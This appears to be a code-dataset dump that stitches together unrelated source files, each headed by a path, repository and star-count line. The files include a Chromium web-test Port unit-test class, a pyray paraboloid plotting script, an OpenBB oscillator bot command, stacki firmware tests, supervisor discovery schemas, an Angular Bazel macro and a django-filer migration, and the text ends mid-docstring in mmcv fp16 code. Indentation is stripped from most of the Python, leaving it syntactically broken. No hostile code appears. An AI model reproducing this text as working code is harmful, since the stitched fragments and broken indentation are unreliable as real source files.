# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit testing base class for Port implementations."""
import collections
import optparse
from blinkpy.common import exit_codes
from blinkpy.common.system.executive import ScriptError
from blinkpy.common.system.executive_mock import MockExecutive
from blinkpy.common.system.log_testing import LoggingTestCase
from blinkpy.common.system.system_host import SystemHost
from blinkpy.common.system.system_host_mock import MockSystemHost
from blinkpy.web_tests.port.base import Port
class FakePrinter(object):
def write_update(self, msg):
pass
def write_throttled_update(self, msg):
pass
class PortTestCase(LoggingTestCase):
"""Tests that all Port implementations must pass."""
# Some tests in this class test or override protected methods
# pylint: disable=protected-access
HTTP_PORTS = (8000, 8080, 8443)
WEBSOCKET_PORTS = (8880, )
# Subclasses override this to point to their Port subclass.
os_name = None
os_version = None
port_maker = Port
port_name = None
full_port_name = None
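    # Hedged illustration (module and names below are made up): a concrete platform
    # test case would typically pin these class attributes, e.g.
    #
    #   class ExamplePortTest(PortTestCase):
    #       os_name = 'linux'
    #       os_version = 'trusty'
    #       port_name = 'linux'
    #       full_port_name = 'linux-trusty'
    #       port_maker = example_port.ExamplePort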
def make_port(self,
host=None,
port_name=None,
options=None,
os_name=None,
os_version=None,
**kwargs):
host = host or MockSystemHost(
os_name=(os_name or self.os_name),
os_version=(os_version or self.os_version))
options = options or optparse.Values({
'configuration': 'Release',
'use_xvfb': True
})
port_name = port_name or self.port_name
port_name = self.port_maker.determine_full_port_name(
host, options, port_name)
return self.port_maker(host, port_name, options=options, **kwargs)
def test_check_build(self):
port = self.make_port()
# Here we override methods to make it appear as though the build
# requirements are all met and the driver is found.
port._check_file_exists = lambda path, desc: True
if port._dump_reader:
port._dump_reader.check_is_functional = lambda: True
port._options.build = True
port._check_driver_build_up_to_date = lambda config: True
port.check_httpd = lambda: True
self.assertEqual(
port.check_build(needs_http=True, printer=FakePrinter()),
exit_codes.OK_EXIT_STATUS)
logs = ''.join(self.logMessages())
self.assertNotIn('build requirements', logs)
# And here, after changing it so that the driver binary is not found,
# we get an error exit status and message about build requirements.
port._check_file_exists = lambda path, desc: False
self.assertEqual(
port.check_build(needs_http=True, printer=FakePrinter()),
exit_codes.UNEXPECTED_ERROR_EXIT_STATUS)
logs = ''.join(self.logMessages())
self.assertIn('build requirements', logs)
def test_default_batch_size(self):
port = self.make_port()
# Test that we set a finite batch size for sanitizer builds.
port._options.enable_sanitizer = True
sanitized_batch_size = port.default_batch_size()
self.assertIsNotNone(sanitized_batch_size)
def test_default_child_processes(self):
port = self.make_port()
num_workers = port.default_child_processes()
self.assertGreaterEqual(num_workers, 1)
def test_default_max_locked_shards(self):
port = self.make_port()
port.default_child_processes = lambda: 16
self.assertEqual(port.default_max_locked_shards(), 4)
port.default_child_processes = lambda: 2
self.assertEqual(port.default_max_locked_shards(), 1)
def test_default_timeout_ms(self):
self.assertEqual(self.make_port().timeout_ms(), 6000)
def test_timeout_ms_release(self):
self.assertEqual(
self.make_port(options=optparse.Values(
{'configuration': 'Release'})).timeout_ms(),
self.make_port().timeout_ms())
def test_timeout_ms_debug(self):
self.assertEqual(
self.make_port(options=optparse.Values({'configuration': 'Debug'
})).timeout_ms(),
5 * self.make_port().timeout_ms())
def make_dcheck_port(self, options):
host = MockSystemHost(os_name=self.os_name, os_version=self.os_version)
host.filesystem.write_text_file(
self.make_port(host)._build_path('args.gn'),
'is_debug=false\ndcheck_always_on = true # comment\n')
port = self.make_port(host, options=options)
return port
def test_timeout_ms_with_dcheck(self):
default_timeout_ms = self.make_port().timeout_ms()
self.assertEqual(
self.make_dcheck_port(options=optparse.Values(
{'configuration': 'Release'})).timeout_ms(),
2 * default_timeout_ms)
self.assertEqual(
self.make_dcheck_port(options=optparse.Values(
{'configuration': 'Debug'})).timeout_ms(),
5 * default_timeout_ms)
def test_driver_cmd_line(self):
port = self.make_port()
self.assertTrue(len(port.driver_cmd_line()))
options = optparse.Values(
dict(additional_driver_flag=['--foo=bar', '--foo=baz']))
port = self.make_port(options=options)
cmd_line = port.driver_cmd_line()
self.assertTrue('--foo=bar' in cmd_line)
self.assertTrue('--foo=baz' in cmd_line)
def test_diff_image__missing_both(self):
port = self.make_port()
self.assertEqual(port.diff_image(None, None), (None, None))
self.assertEqual(port.diff_image(None, ''), (None, None))
self.assertEqual(port.diff_image('', None), (None, None))
self.assertEqual(port.diff_image('', ''), (None, None))
def test_diff_image__missing_actual(self):
port = self.make_port()
self.assertEqual(port.diff_image(None, 'foo'), ('foo', None))
self.assertEqual(port.diff_image('', 'foo'), ('foo', None))
def test_diff_image__missing_expected(self):
port = self.make_port()
self.assertEqual(port.diff_image('foo', None), ('foo', None))
self.assertEqual(port.diff_image('foo', ''), ('foo', None))
def test_diff_image(self):
def _path_to_image_diff():
return '/path/to/image_diff'
port = self.make_port()
port._path_to_image_diff = _path_to_image_diff
mock_image_diff = 'MOCK Image Diff'
def mock_run_command(args):
port.host.filesystem.write_binary_file(args[4], mock_image_diff)
raise ScriptError(exit_code=1)
# Images are different.
port._executive = MockExecutive(run_command_fn=mock_run_command) # pylint: disable=protected-access
self.assertEqual(mock_image_diff,
port.diff_image('EXPECTED', 'ACTUAL')[0])
# Images are the same.
port._executive = MockExecutive(exit_code=0) # pylint: disable=protected-access
self.assertEqual(None, port.diff_image('EXPECTED', 'ACTUAL')[0])
# There was some error running image_diff.
port._executive = MockExecutive(exit_code=2) # pylint: disable=protected-access
exception_raised = False
try:
port.diff_image('EXPECTED', 'ACTUAL')
except ValueError:
exception_raised = True
self.assertFalse(exception_raised)
def test_diff_image_crashed(self):
port = self.make_port()
port._executive = MockExecutive(should_throw=True, exit_code=2) # pylint: disable=protected-access
self.assertEqual(
port.diff_image('EXPECTED', 'ACTUAL'),
(None,
'Image diff returned an exit code of 2. See http://crbug.com/278596'
))
def test_test_configuration(self):
port = self.make_port()
self.assertTrue(port.test_configuration())
def test_get_crash_log_all_none(self):
port = self.make_port()
stderr, details, crash_site = port._get_crash_log(
None, None, None, None, newer_than=None)
self.assertIsNone(stderr)
self.assertEqual(
details, b'crash log for <unknown process name> (pid <unknown>):\n'
b'STDOUT: <empty>\n'
b'STDERR: <empty>\n')
self.assertIsNone(crash_site)
def test_get_crash_log_simple(self):
port = self.make_port()
stderr, details, crash_site = port._get_crash_log(
'foo',
1234,
b'out bar\nout baz',
b'err bar\nerr baz\n',
newer_than=None)
self.assertEqual(stderr, b'err bar\nerr baz\n')
self.assertEqual(
details, b'crash log for foo (pid 1234):\n'
b'STDOUT: out bar\n'
b'STDOUT: out baz\n'
b'STDERR: err bar\n'
b'STDERR: err baz\n')
self.assertIsNone(crash_site)
def test_get_crash_log_non_ascii(self):
port = self.make_port()
stderr, details, crash_site = port._get_crash_log('foo',
1234,
b'foo\xa6bar',
b'foo\xa6bar',
newer_than=None)
self.assertEqual(stderr, b'foo\xa6bar')
self.assertEqual(
details.decode('utf8', 'replace'),
u'crash log for foo (pid 1234):\n'
u'STDOUT: foo\ufffdbar\n'
u'STDERR: foo\ufffdbar\n')
self.assertIsNone(crash_site)
def test_get_crash_log_newer_than(self):
port = self.make_port()
stderr, details, crash_site = port._get_crash_log('foo',
1234,
b'foo\xa6bar',
b'foo\xa6bar',
newer_than=1.0)
self.assertEqual(stderr, b'foo\xa6bar')
self.assertEqual(
details.decode('utf8', 'replace'),
u'crash log for foo (pid 1234):\n'
u'STDOUT: foo\ufffdbar\n'
u'STDERR: foo\ufffdbar\n')
self.assertIsNone(crash_site)
def test_get_crash_log_crash_site(self):
port = self.make_port()
stderr, details, crash_site = port._get_crash_log(
'foo',
1234,
b'out bar',
b'[1:2:3:4:FATAL:example.cc(567)] Check failed.',
newer_than=None)
self.assertEqual(stderr,
b'[1:2:3:4:FATAL:example.cc(567)] Check failed.')
self.assertEqual(
details, b'crash log for foo (pid 1234):\n'
b'STDOUT: out bar\n'
b'STDERR: [1:2:3:4:FATAL:example.cc(567)] Check failed.\n')
self.assertEqual(crash_site, 'example.cc(567)')
def test_default_expectations_files(self):
port = self.make_port()
self.assertEqual(list(port.default_expectations_files()), [
port.path_to_generic_test_expectations_file(),
port.path_to_webdriver_expectations_file(),
port.host.filesystem.join(port.web_tests_dir(), 'NeverFixTests'),
port.host.filesystem.join(port.web_tests_dir(),
'StaleTestExpectations'),
port.host.filesystem.join(port.web_tests_dir(), 'SlowTests'),
])
def test_default_expectations_ordering(self):
port = self.make_port()
for path in port.default_expectations_files():
port.host.filesystem.write_text_file(path, '')
ordered_dict = port.expectations_dict()
self.assertEqual(port.path_to_generic_test_expectations_file(),
list(ordered_dict)[0])
options = optparse.Values(
dict(additional_expectations=['/tmp/foo', '/tmp/bar']))
port = self.make_port(options=options)
for path in port.default_expectations_files():
port.host.filesystem.write_text_file(path, '')
port.host.filesystem.write_text_file('/tmp/foo', 'foo')
port.host.filesystem.write_text_file('/tmp/bar', 'bar')
ordered_dict = port.expectations_dict()
self.assertEqual(
list(ordered_dict)[-2:], options.additional_expectations)
self.assertEqual(list(ordered_dict.values())[-2:], ['foo', 'bar'])
def test_used_expectations_files(self):
options = optparse.Values({
'additional_expectations': ['/tmp/foo'],
'additional_driver_flag': ['flag-specific']
})
port = self.make_port(options=options)
self.assertEqual(list(port.used_expectations_files()), [
port.path_to_generic_test_expectations_file(),
port.path_to_webdriver_expectations_file(),
port.host.filesystem.join(port.web_tests_dir(), 'NeverFixTests'),
port.host.filesystem.join(port.web_tests_dir(),
'StaleTestExpectations'),
port.host.filesystem.join(port.web_tests_dir(), 'SlowTests'),
port.host.filesystem.join(port.web_tests_dir(), 'FlagExpectations',
'flag-specific'),
'/tmp/foo',
])
def test_path_to_apache_config_file(self):
# Specific behavior may vary by port, so unit test sub-classes may override this.
port = self.make_port()
port.host.environ[
'WEBKIT_HTTP_SERVER_CONF_PATH'] = '/path/to/httpd.conf'
with self.assertRaises(IOError):
port.path_to_apache_config_file()
port.host.filesystem.write_text_file('/existing/httpd.conf',
'Hello, world!')
port.host.environ[
'WEBKIT_HTTP_SERVER_CONF_PATH'] = '/existing/httpd.conf'
self.assertEqual(port.path_to_apache_config_file(),
'/existing/httpd.conf')
# Mock out _apache_config_file_name_for_platform to avoid mocking platform info.
port._apache_config_file_name_for_platform = lambda: 'httpd.conf'
del port.host.environ['WEBKIT_HTTP_SERVER_CONF_PATH']
self.assertEqual(
port.path_to_apache_config_file(),
port.host.filesystem.join(port.apache_config_directory(),
'httpd.conf'))
# Check that even if we mock out _apache_config_file_name, the environment variable takes precedence.
port.host.environ[
'WEBKIT_HTTP_SERVER_CONF_PATH'] = '/existing/httpd.conf'
self.assertEqual(port.path_to_apache_config_file(),
'/existing/httpd.conf')
def test_additional_platform_directory(self):
port = self.make_port(
options=optparse.Values(
dict(additional_platform_directory=['/tmp/foo'])))
self.assertEqual(port.baseline_search_path()[0], '/tmp/foo')
def test_virtual_test_suites(self):
# We test that we can load the real web_tests/VirtualTestSuites file properly, so we
# use a real SystemHost(). We don't care what virtual_test_suites() returns as long
# as it is iterable.
port = self.make_port(host=SystemHost(), port_name=self.full_port_name)
self.assertTrue(
isinstance(port.virtual_test_suites(), collections.Iterable))
|
videos/lagrange.py
|
ryu577/pyray
| 715 |
65015
|
import numpy as np
from pyray.shapes.twod.paraboloid import *
from pyray.shapes.twod.functional import *
from pyray.rotation import *
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import matplotlib as mpl
import os
basedir = '.\\Images\\RotatingCube\\'
if os.name == 'posix':
basedir = 'Images/RotatingCube/'
def draw_cubic():
fn = lambda x,y: x**3+y**3
for i in range(20):
im = Image.new("RGB", (2048, 2048), "black")
draw = ImageDraw.Draw(im, 'RGBA')
r = general_rotation(np.array([1,0,0]),np.pi/120*i)
#drawFunctionalXYGridInCircle(draw, r, fn=fn, scale=10.0)
im.save(basedir + 'im' + str(i) + '.png')
def three_d_grid():
fig = plt.figure()
ax = fig.gca(projection='3d')
# Make data.
X = np.arange(-5, 5, 0.25)
Y = np.arange(-5, 5, 0.25)
X, Y = np.meshgrid(X, Y)
R = (X**3 + Y**3)
Z = R
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,
linewidth=0, antialiased=False)
# Customize the z axis.
#ax.set_zlim(-1.01, 1.01)
#ax.zaxis.set_major_locator(LinearLocator(10))
#ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
# Add a color bar which maps values to colors.
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
ax = fig.gca(projection='3d')
theta = np.linspace(0, 2 * np.pi, 100)
for r in np.arange(0.1,1.0,0.1):
#r = 1.0
x = r * np.sin(theta)
y = r * np.cos(theta)
z = x**3+y**3
ax.plot(x, y, z, label='parametric curve')
#ax.legend()
plt.show()
def paraboloid_w_grad(im_ind=0, scale=200, shift=np.array([1000,1000,0]), opacity=60,
basepath='.\\'):
r1 = np.eye(4)
rot = general_rotation(np.array([0,0,1]), np.pi/20.0 * (8 + im_ind/3.0))
j=4
r = rotation(3, 2 * np.pi* j /30.0)
rr = general_rotation(np.array([0,1,0]), np.pi/20.0 * (im_ind/7.0))
r = np.dot(r,rr)
r = np.dot(r, rot)
r1[:3,:3] = r
im = Image.new("RGB", (2048, 2048), "black")
draw = ImageDraw.Draw(im, 'RGBA')
render_scene_4d_axis(draw, r1, 4, scale, shift)
# This is what draws the pink paraboloid.
for z in np.arange(0.001, 3.5, 0.02):
point1 = np.array([np.sqrt(z),0,z])
generalized_arc(draw, r, center=np.array([0,0,z]), vec=np.array([0,0,1]),
point=point1, radius=np.sqrt(z), prcnt=1.0,
rgba=(255,20,147,50))
xax1=np.array([-100.0,0,0.0]);xax1=np.dot(r,xax1)*scale+shift
xax2=np.array([100.0,0,0.0]);xax2=np.dot(r,xax2)*scale+shift
draw.line((xax1[0], xax1[1], xax2[0], xax2[1]), fill=(255,255,0), width=4)
xax1=np.array([0.0,-100,0.0]);xax1=np.dot(r,xax1)*scale+shift
xax2=np.array([0.0,100,0.0]);xax2=np.dot(r,xax2)*scale+shift
draw.line((xax1[0], xax1[1], xax2[0], xax2[1]), fill=(255,255,0), width=4)
#gradients(draw,r)
pt = shift
draw.ellipse((pt[0]-10, pt[1]-10, pt[0]+10, pt[1]+10), fill = (0,255,0))
draw_paraboloid_plane(draw,r,3.3)
draw_paraboloid_plane(draw,r,2.0,extent=1.4)
draw_paraboloid_plane(draw,r,1.0,extent=1.0)
im.save(basepath + 'im' + str(im_ind) + '.png')
def gradients(draw,r):
#for z in [0.3,1.3,2.3,3.3]:
for z in [3.3,2.0,1.0]:
x = np.sqrt(z)
for x in np.arange(-x,x,x/2):
y = np.sqrt(z-x*x)
arrowV1(draw,r,np.array([y,x,z]), np.array([1.5*y,1.5*x,z]), (204,102,255))
if z>3.0:
arrowV1(draw,r,np.array([-y,x,z]), np.array([-1.5*y,1.5*x,z]), (204,102,255))
def draw_paraboloid_plane(draw,r,z=3.3,scale=200,shift=np.array([1000,1000,0]),extent=2):
pt1=np.array([extent,extent,z]);pt1=np.dot(r,pt1)*scale+shift
pt2=np.array([extent,-extent,z]);pt2=np.dot(r,pt2)*scale+shift
pt3=np.array([-extent,-extent,z]);pt3=np.dot(r,pt3)*scale+shift
pt4=np.array([-extent,extent,z]);pt4=np.dot(r,pt4)*scale+shift
draw.polygon([(pt1[0], pt1[1]), (pt2[0], pt2[1]), (pt3[0], pt3[1]), (pt4[0], pt4[1])],\
(0,102,255,50))
point1 = np.array([np.sqrt(z),0,z])
generalized_arc(draw, r, center=np.array([0,0,z]), vec=np.array([0,0,1]),
point=point1, radius=np.sqrt(z), prcnt=1.0,scale=scale,
rgba=(255,20,10,100),width=10)
def plane_w_arrows(im_ind=0, scale=200,\
shift=np.array([824,824,0]),\
basepath='.\\'):
r1 = np.eye(4)
rot = general_rotation(np.array([0,0,1]), np.pi/20.0*(8 + im_ind/3.0))
j=4
r = rotation(3, 2*np.pi*j/30.0)
rr = general_rotation(np.array([0,1,0]), np.pi/20.0*(im_ind/7.0))
r = np.dot(r,rr)
r = np.dot(r, rot)
r1[:3,:3] = r
im = Image.new("RGB", (1648, 1648), "black")
draw = ImageDraw.Draw(im, 'RGBA')
pt1 = 3*np.array([1.0,-1.0,0]); pt2 = 3*np.array([1.0,1.0,0])
z = 1.2**2+1
pt3 = 3*np.array([-1.0,1.0,0]); pt4 = 3*np.array([-1.0,-1.0,0])
pt1 = np.dot(r,pt1)*scale+shift; pt2 = np.dot(r,pt2)*scale+shift
pt3 = np.dot(r,pt3)*scale+shift; pt4 = np.dot(r,pt4)*scale+shift
draw.polygon([(pt1[0], pt1[1]), (pt2[0], pt2[1]), (pt3[0], pt3[1]), (pt4[0], pt4[1])],\
(0,102,255,50))
draw_arrows(draw,r,rgba=(255,250,47),shift=shift)
draw_arrows(draw,r,rot_angl=np.pi/2.0, rgba=(73,200,250),shift=shift)
draw_arrows(draw,r,rot_angl=np.pi/2.0+np.pi/3, rgba=(255,20,147),shift=shift)
arrowV1(draw,r,np.array([0,0,0]), np.array([0,0,2.5]), shift=shift,rgb=(20,200,25))
arrowV1(draw,r,np.array([0,0,0]), np.array([0,0,-2.5]), shift=shift,rgb=(255,20,25))
im.save(basepath + 'im' + str(im_ind) + '.png')
def draw_arrows(draw,r,rot_angl=np.pi/6.0,rgba=(255,20,147),shift=np.array([1000,1000,0])):
base = np.array([0,0,1.5])
for theta in np.arange(0,np.pi*2,2*np.pi/3):
a = np.array([np.cos(theta),np.sin(theta),0])
rr = general_rotation(a, rot_angl)
arrow1 = np.dot(rr,base)
arrowV1(draw,r,np.array([0,0,0]), arrow1, rgb=rgba,shift=shift)
rgba = rgba+(150,)
generalized_arc(draw, r, center=np.array([0,0,1.5*np.cos(rot_angl)]),
vec=np.array([0,0,1]),
point=1.5*np.array([0,np.sin(rot_angl),np.cos(rot_angl)]),
radius=100, prcnt=1.0,
rgba=rgba,shift=shift)
#####################
## Paraboloid with Lagrange visualized.
im = Image.new("RGB", (2048, 2048), (1, 1, 1))
draw = ImageDraw.Draw(im, 'RGBA')
scale=5.0; ind=0; sep = 24; i = 2.0; base_coeff = 0.02; start_line = -12.0
shift = np.array([1000.0, 1000.0, 0.0])
r1 = np.eye(4); j=24
r = rotation(3, np.pi/30*j)
r1[:3,:3] = r
render_scene_4d_axis(draw, r1, 4)
fn = lambda x, y : paraboloid(x, y, coeff=i*base_coeff, intercept=i)
drawFunctionalXYGrid(draw, r, scale=scale, fn=fn,
extent=60, rgba2=(255,20,147,80),
saperatingPlane=np.array([-1,-1,sep]))
# three_d_parabola(draw, r, r2)  # disabled here: r2 is not defined in this script
im.save(basedir + 'im' + str(0) + '.png')
|
bots/stocks/technical_analysis/adosc.py
|
tehcoderer/GamestonkTerminal
| 255 |
65025
|
import logging
import plotly.graph_objects as go
from bots import imps, load_candle
from openbb_terminal.common.technical_analysis import volume_model
from openbb_terminal.decorators import log_start_end
# pylint: disable=R0913
logger = logging.getLogger(__name__)
@log_start_end(log=logger)
def adosc_command(
ticker="",
interval: int = 15,
past_days: int = 0,
is_open: bool = False,
fast="3",
slow="10",
start="",
end="",
extended_hours: bool = False,
heikin_candles: bool = False,
trendline: bool = False,
news: bool = False,
):
"""Displays chart with chaikin oscillator [Yahoo Finance]"""
# Debug
if imps.DEBUG:
# pylint: disable=logging-too-many-args
logger.debug(
"ta adosc %s %s %s %s %s %s %s %s %s %s %s %s",
ticker,
interval,
past_days,
is_open,
fast,
slow,
start,
end,
extended_hours,
heikin_candles,
trendline,
news,
)
# Check for argument
if ticker == "":
raise Exception("Stock ticker is required")
if not fast.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
fast = int(fast)
if not slow.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
slow = int(slow)
# Retrieve Data
df_stock, start, end, bar_start = load_candle.stock_data(
ticker=ticker,
interval=interval,
past_days=past_days,
extended_hours=extended_hours,
start=start,
end=end,
heikin_candles=heikin_candles,
)
if df_stock.empty:
raise Exception("No Data Found")
df_ta = df_stock.loc[(df_stock.index >= start) & (df_stock.index < end)]
df_ta = df_ta.join(volume_model.adosc(df_stock, is_open, fast, slow))
# Output Data
if interval != 1440:
df_ta = df_ta.loc[(df_ta.index >= bar_start) & (df_ta.index < end)]
df_ta = df_ta.fillna(0.0)
plot = load_candle.candle_fig(
df_ta,
ticker,
interval,
extended_hours,
news,
bar=bar_start,
int_bar=interval,
trendline=trendline,
rows=2,
cols=1,
shared_xaxes=True,
vertical_spacing=0.05,
row_width=[0.4, 0.7],
specs=[
[{"secondary_y": True}],
[{"secondary_y": False}],
],
)
title = f"<b>{plot['plt_title']} AD Oscillator</b>"
fig = plot["fig"]
fig.add_trace(
go.Scatter(
name="AD Osc [M]",
mode="lines",
x=df_ta.index,
y=df_ta.iloc[:, 6].values
if (not trendline) and (interval != 1440)
else df_ta.iloc[:, 11].values,
line=dict(width=2),
opacity=1,
),
row=2,
col=1,
)
fig.update_layout(
margin=dict(l=0, r=0, t=50, b=20),
template=imps.PLT_TA_STYLE_TEMPLATE,
colorway=imps.PLT_TA_COLORWAY,
title=title,
title_x=0.1,
title_font_size=14,
dragmode="pan",
)
imagefile = "ta_adosc.png"
# Check if interactive settings are enabled
plt_link = ""
if imps.INTERACTIVE:
plt_link = imps.inter_chart(fig, imagefile, callback=False)
imagefile = imps.image_border(imagefile, fig=fig)
return {
"title": f"Stocks: Accumulation/Distribution Oscillator {ticker.upper()}",
"description": plt_link,
"imagefile": imagefile,
}
|
test-framework/test-suites/integration/tests/list/test_list_host_firmware_mapping.py
|
anooprajendra/stacki
| 123 |
65026
|
<reponame>anooprajendra/stacki<gh_stars>100-1000
import json
import pytest
@pytest.mark.parametrize(
"hosts, expected_results",
(
(
"",
[
{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"},
{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"},
],
),
("backend-0-0", [{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"}]),
("backend-0-1", [{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"}]),
),
)
def test_list_host_firmware_mapping_host_filter(
host,
add_host_with_net,
fake_local_firmware_file,
revert_firmware,
hosts,
expected_results,
):
"""Test that list host firmware mapping filters correctly based on provided arguments."""
# Add a backend-0-1
add_host_with_net(
hostname = "backend-0-1",
rack = 0,
rank = 1,
appliance = "backend",
interface = "eth0",
ip = "192.168.1.1",
network = "fake_net",
address = "192.168.1.0",
pxe = True,
)
# Add a piece of mellanox firmware to backend-0-0.
result = host.run(f"stack add firmware 1.2.3 make=mellanox model=m7800 source={fake_local_firmware_file} hosts=backend-0-0")
assert result.rc == 0
# Add a piece of dell firmware to backend-0-1
result = host.run(f"stack add firmware 1.2.3.4 make=dell model=x1052-software source={fake_local_firmware_file} hosts=backend-0-1")
assert result.rc == 0
# List the firmware mappings
result = host.run(f"stack list host firmware mapping {hosts} output-format=json")
assert result.rc == 0
assert expected_results == json.loads(result.stdout)
@pytest.mark.parametrize(
"make, model, versions, expected_results",
(
(
"",
"",
"",
[
{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"},
{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"},
],
),
("mellanox", "", "", [{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"}]),
("mellanox", "m7800", "", [{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"}]),
("mellanox", "m7800", "1.2.3", [{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"}]),
("dell", "", "", [{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"}]),
("dell", "x1052-software", "", [{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"}]),
("dell", "x1052-software", "1.2.3.4", [{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"}]),
),
)
def test_list_host_firmware_mapping_non_host_filter(
host,
add_host_with_net,
fake_local_firmware_file,
revert_firmware,
make,
model,
versions,
expected_results,
):
"""Test that list host firmware mapping filters correctly based on provided arguments."""
# Add a backend-0-1
add_host_with_net(
hostname = "backend-0-1",
rack = 0,
rank = 1,
appliance = "backend",
interface = "eth0",
ip = "192.168.1.1",
network = "fake_net",
address = "192.168.1.0",
pxe = True,
)
# Add a piece of mellanox firmware to backend-0-0.
result = host.run(f"stack add firmware 1.2.3 make=mellanox model=m7800 source={fake_local_firmware_file} hosts=backend-0-0")
assert result.rc == 0
# Add a piece of dell firmware to backend-0-1
result = host.run(f"stack add firmware 1.2.3.4 make=dell model=x1052-software source={fake_local_firmware_file} hosts=backend-0-1")
assert result.rc == 0
# List the firmware mappings
result = host.run(
f"stack list host firmware mapping {f'make={make}' if make else ''} {f'model={model}' if model else ''} "
f"{f'versions={versions}' if versions else ''} output-format=json"
)
assert result.rc == 0
assert expected_results == json.loads(result.stdout)
|
supervisor/discovery/validate.py
|
pnjongang/supervisor
| 597 |
65030
|
"""Validate services schema."""
from importlib import import_module
from pathlib import Path
import voluptuous as vol
from ..const import ATTR_ADDON, ATTR_CONFIG, ATTR_DISCOVERY, ATTR_SERVICE, ATTR_UUID
from ..utils.validate import schema_or
from ..validate import uuid_match
def valid_discovery_service(service):
"""Validate service name."""
service_file = Path(__file__).parent.joinpath(f"services/{service}.py")
if not service_file.exists():
raise vol.Invalid(f"Service {service} not found") from None
return service
def valid_discovery_config(service, config):
"""Validate service name."""
try:
service_mod = import_module(f".services.{service}", "supervisor.discovery")
except ImportError:
raise vol.Invalid(f"Service {service} not found") from None
return service_mod.SCHEMA(config)
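# Hedged illustration of the contract valid_discovery_config() relies on: each module
# under services/ is expected to expose a voluptuous ``SCHEMA`` that is applied to the
# discovery payload. The service name and keys below are made up for the example.
#
#   # services/example.py
#   import voluptuous as vol
#   SCHEMA = vol.Schema({vol.Required("host"): str, vol.Required("port"): int})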
SCHEMA_DISCOVERY = vol.Schema(
[
vol.Schema(
{
vol.Required(ATTR_UUID): uuid_match,
vol.Required(ATTR_ADDON): str,
vol.Required(ATTR_SERVICE): valid_discovery_service,
vol.Required(ATTR_CONFIG): vol.Maybe(dict),
},
extra=vol.REMOVE_EXTRA,
)
]
)
SCHEMA_DISCOVERY_CONFIG = vol.Schema(
{vol.Optional(ATTR_DISCOVERY, default=list): schema_or(SCHEMA_DISCOVERY)},
extra=vol.REMOVE_EXTRA,
)
|
modules/benchmarks/e2e_test.bzl
|
John-Cassidy/angular
| 95,154 |
65047
|
load("//tools:defaults.bzl", "protractor_web_test_suite")
"""
Macro that can be used to define an e2e test in `modules/benchmarks`. Targets created through
this macro differ from a "benchmark_test" in that they run on CI and do not run
with `@angular/benchpress`.
"""
def e2e_test(name, server, **kwargs):
protractor_web_test_suite(
name = name,
on_prepare = "@npm//@angular/dev-infra-private/bazel/benchmark/component_benchmark:start-server.js",
server = server,
**kwargs
)
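# Hedged usage sketch (target and label names are made up):
#
#   e2e_test(
#       name = "perf_e2e",
#       server = "//modules/benchmarks/src/example:devserver",
#       deps = [":e2e_test_lib"],
#   )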
|
tech_project/lib/python2.7/site-packages/filer/migrations/0005_auto_20160623_1425.py
|
priyamshah112/Project-Descripton-Blog
| 134 |
65049
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-23 18:25
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('filer', '0004_auto_20160328_1434'),
]
operations = [
migrations.AlterField(
model_name='file',
name='owner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='owned_files', to=settings.AUTH_USER_MODEL, verbose_name='owner'),
),
migrations.AlterField(
model_name='folder',
name='owner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='filer_owned_folders', to=settings.AUTH_USER_MODEL, verbose_name='owner'),
),
migrations.AlterField(
model_name='folderpermission',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='filer_folder_permissions', to=settings.AUTH_USER_MODEL, verbose_name='user'),
),
]
|
mmcv/runner/fp16_utils.py
|
lyttonhao/mmcv
| 549 |
65054
|
<gh_stars>100-1000
import functools
from collections import OrderedDict, abc
from inspect import getfullargspec
import numpy as np
import torch
import torch.distributed as dist
import torch.nn as nn
from torch._utils import (_flatten_dense_tensors, _take_tensors,
_unflatten_dense_tensors)
def cast_tensor_type(inputs, src_type, dst_type):
"""Recursively convert Tensor in inputs from src_type to dst_type.
Args:
        inputs: Inputs to be cast.
        src_type (torch.dtype): Source type.
        dst_type (torch.dtype): Destination type.
    Returns:
